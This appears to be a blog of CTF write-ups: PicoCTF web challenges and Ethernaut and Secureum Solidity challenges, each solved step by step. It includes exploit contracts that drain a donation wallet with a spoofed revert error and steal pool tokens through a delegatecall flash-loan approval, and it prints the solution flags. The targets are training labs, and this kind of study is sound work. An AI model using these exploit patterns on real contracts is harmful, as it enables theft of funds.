22 Sep 2022
PicoCTF 2022 / Web Exploitation
Description
Can you get the flag?
Go to this website and see what you can discover.
Writeup
- Click Continue as guest button, there is a page tell you they don’t have guest service.
- Change
isAdmin
cookie value to 1.
- Refresh the page.
- Here’s flag:
picoCTF{gr4d3_A_c00k13_5d2505be}
٩(^ᴗ^)۶
22 Sep 2022
PicoCTF 2022 / Web Exploitation
Description
The developer of this website mistakenly left an important artifact in the website source, can you find it?
The website is here
Writeup
wget -m http://saturn.picoctf.net:58133/
to get source code.
grep -r 'picoCTF' saturn.picoctf.net:58133
to search the flag!
- Here’s flag:
picoCTF{1nsp3ti0n_0f_w3bpag3s_587d12b8}
٩(^ᴗ^)۶
18 Sep 2022
Difficulty: 🌕🌕🌕🌑🌑
To solve this level, you only need to provide the Ethernaut with a Solver
, a contract that responds to whatIsTheMeaningOfLife()
with the right number.
Easy right? Well… there’s a catch.
The solver’s code needs to be really tiny. Really reaaaaaallly tiny. Like freakin’ really really itty-bitty tiny: 10 opcodes at most.
Hint: Perhaps its time to leave the comfort of the Solidity compiler momentarily, and build this one by hand O_o. That’s right: Raw EVM bytecode.
Good luck!
Contract
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
contract MagicNum {
address public solver;
constructor() public {}
function setSolver(address _solver) public {
solver = _solver;
}
/*
____________/\\\_______/\\\\\\\\\_____
__________/\\\\\_____/\\\///////\\\___
________/\\\/\\\____\///______\//\\\__
______/\\\/\/\\\______________/\\\/___
____/\\\/__\/\\\___________/\\\//_____
__/\\\\\\\\\\\\\\\\_____/\\\//________
_\///////////\\\//____/\\\/___________
___________\/\\\_____/\\\\\\\\\\\\\\\_
___________\///_____\///////////////__
*/
}
Writeup
- Get new instance.
- Create a new contract
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
contract MagicNumberCracker{
constructor() public{
assembly{
mstore(0x00, 0x602a60005260206000f3)
return(0x16, 0x0a)
}
}
}
How 0x602a60005260206000f3
come from ?
- PUSH(0x2a) –> 0x602a (Push 42 onto the stack)
- PUSH(0x00) –> 0x6000 (Push memory slot 00 to stack)
- MSTORE –> 0x52 (Store 42 to memory slot 00)
- PUSH(0x20) –> 0x6020 (Memory slot size is 32 bytes)
- PUSH(0x80) –> 0x6000 (Value is stored at moemory slot 00)
- RETURN –> 0xf3 (Return value which is stored at memory 00 with sizeof 32 bytes)
- Compile and Deploy.
- Set Solver :
await contract.setSolver('MAGICNUMBERCRACKER_CONTRACT_ADDRESS')
- Submit instance ξ( ✿>◡❛)
Reference
16 Sep 2022
Difficulty: 🌕🌕🌕🌑🌑
This instance represents a Good Samaritan that is wealthy and ready to donate some coins to anyone requesting it.
Would you be able to drain all the balance from his Wallet?
Things that might help:
Contract
// SPDX-License-Identifier: MIT
pragma solidity >=0.8.0 <0.9.0;
import "openzeppelin-contracts-08/utils/Address.sol";
contract GoodSamaritan {
Wallet public wallet;
Coin public coin;
constructor() {
wallet = new Wallet();
coin = new Coin(address(wallet));
wallet.setCoin(coin);
}
function requestDonation() external returns(bool enoughBalance){
// donate 10 coins to requester
try wallet.donate10(msg.sender) {
return true;
} catch (bytes memory err) {
if (keccak256(abi.encodeWithSignature("NotEnoughBalance()")) == keccak256(err)) {
// send the coins left
wallet.transferRemainder(msg.sender);
return false;
}
}
}
}
contract Coin {
using Address for address;
mapping(address => uint256) public balances;
error InsufficientBalance(uint256 current, uint256 required);
constructor(address wallet_) {
// one million coins for Good Samaritan initially
balances[wallet_] = 10**6;
}
function transfer(address dest_, uint256 amount_) external {
uint256 currentBalance = balances[msg.sender];
// transfer only occurs if balance is enough
if(amount_ <= currentBalance) {
balances[msg.sender] -= amount_;
balances[dest_] += amount_;
if(dest_.isContract()) {
// notify contract
INotifyable(dest_).notify(amount_);
}
} else {
revert InsufficientBalance(currentBalance, amount_);
}
}
}
contract Wallet {
// The owner of the wallet instance
address public owner;
Coin public coin;
error OnlyOwner();
error NotEnoughBalance();
modifier onlyOwner() {
if(msg.sender != owner) {
revert OnlyOwner();
}
_;
}
constructor() {
owner = msg.sender;
}
function donate10(address dest_) external onlyOwner {
// check balance left
if (coin.balances(address(this)) < 10) {
revert NotEnoughBalance();
} else {
// donate 10 coins
coin.transfer(dest_, 10);
}
}
function transferRemainder(address dest_) external onlyOwner {
// transfer balance left
coin.transfer(dest_, coin.balances(address(this)));
}
function setCoin(Coin coin_) external onlyOwner {
coin = coin_;
}
}
interface INotifyable {
function notify(uint256 amount) external;
}
Writeup
The requestDonation()
in the GoodSamaritan contract will call wallet.donate10(msg.sender)
if there are enough coins(>10) in the wallet. If coins in the wallet less then 10, it will revert NotEnoughBalance
error and transfer all remaining coins in the wallet.
- Get new instance.
- Create a new contract.
// SPDX-License-Identifier: MIT
pragma solidity >=0.8.0 <0.9.0;
interface GoodSamaritan {
function requestDonation() external returns(bool enoughBalance);
}
contract GoodSamaritanAttacker {
error NotEnoughBalance();
function attack(address _goodsamaritan) public {
GoodSamaritan(_goodsamaritan).requestDonation();
}
function notify(uint256 _amount) public pure {
if(_amount==10){
revert NotEnoughBalance();
}
}
}
- Get
GoodSamaritan
contract address by typing instance
in the chrome console. For example:
instance
// '0xa273e96Ae56e2cAb404a3221d5356Af4cdd67440'
- Call the
attack
method in GoodSamaritanAttacker
contract with the contract address we get above as a parameter.
- Submit instance ξ( ✿>◡❛)
13 Sep 2022
Secureum A-MAZE-X Stanford Github repo
Challenge 1: What a nice Lender Pool!
Secureum has raised a lot of Ether and decided to buy a bunch of InSecureumTokens ($ISEC) in order to make them available to the community via flash loans. This is made possible by means of the InSecureumLenderPool contract.
📌 Upon deployment, the InSecureumToken contract mints an initial supply of 10 $ISEC to the contract deployer.
📌 The InSecureumLenderPool contract operates with $ISEC.
📌 The contract deployer transfers all of their $ISEC to the InSecureumLenderPool contract.
📌 The idea is that anyone can deposit $ISECs to enlarge the pool’s resources.
Will you be able to steal the $ISECs from the InSecureumLenderPool? 😈😈😈
Contract
InSecureumLenderPool.sol
( The contracts that we will hack. )
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.14;
import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {Address} from "@openzeppelin/contracts/utils/Address.sol";
import {SafeERC20} from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";
// Some ideas for this challenge were taken from damn vulnerable defi
contract InSecureumLenderPool {
using Address for address;
using SafeERC20 for IERC20;
/// @dev Token contract address to be used for lending.
//IERC20 immutable public token;
IERC20 public token;
/// @dev Internal balances of the pool for each user.
mapping(address => uint) public balances;
// flag to notice contract is on a flashloan
bool private _flashLoan;
/// @param _token Address of the token to be used for the lending pool.
constructor (address _token) {
token = IERC20(_token);
}
/// @dev Deposit the given amount of tokens to the lending
/// pool. This will add _amount to balances[msg.sender] and
/// transfer _amount tokens to the lending pool.
/// @param _amount Amount of token to deposit in the lending pool
function deposit(uint256 _amount) external {
require(!_flashLoan, "Cannot deposit while flash loan is active");
token.safeTransferFrom(msg.sender, address(this), _amount);
balances[msg.sender] += _amount;
}
/// @dev Withdraw the given amount of tokens from the lending pool.
function withdraw(uint256 _amount) external {
require(!_flashLoan, "Cannot withdraw while flash loan is active");
balances[msg.sender] -= _amount;
token.safeTransfer(msg.sender, _amount);
}
/// @dev Give borrower all the tokens to make a flashloan.
/// For this with get the amount of tokens in the lending pool before, then we give
/// control to the borrower to make the flashloan. After the borrower makes the flashloan
/// we check if the lending pool has the same amount of tokens as before.
/// @param borrower The contract that will have access to the tokens
/// @param data Function call data to be used by the borrower contract.
function flashLoan(
address borrower,
bytes calldata data
)
external
{
uint256 balanceBefore = token.balanceOf(address(this));
_flashLoan = true;
borrower.functionDelegateCall(data);
_flashLoan = false;
uint256 balanceAfter = token.balanceOf(address(this));
require(balanceAfter >= balanceBefore, "Flash loan hasn't been paid back");
}
}
InSecureumToken.sol
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.14;
import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol";
contract InSecureumToken is ERC20 {
// Decimals are set to 18 by default in `ERC20`
constructor(uint256 _supply) ERC20("InSecureumToken", "ISEC") {
_mint(msg.sender, _supply);
}
}
Writeup
- Finish the
Exploit
contract in test/Challenge1.t.sol
.
contract Exploit {
function flashloanCallback(IERC20 token, address testAddress) public {
token.approve(testAddress, type(uint256).max);
}
}
- Add below code to
testChallenge
function.
Exploit exploit = new Exploit();
target.flashLoan(
address(exploit),
abi.encodeWithSelector(
Exploit.flashloanCallback.selector,
token,
player
)
);
IERC20(token).transferFrom(address(target), player, IERC20(token).balanceOf(address(target)));
- Run
forge test --match-path test/Challenge1.t.sol
Reference
Function selector
Ventral.digital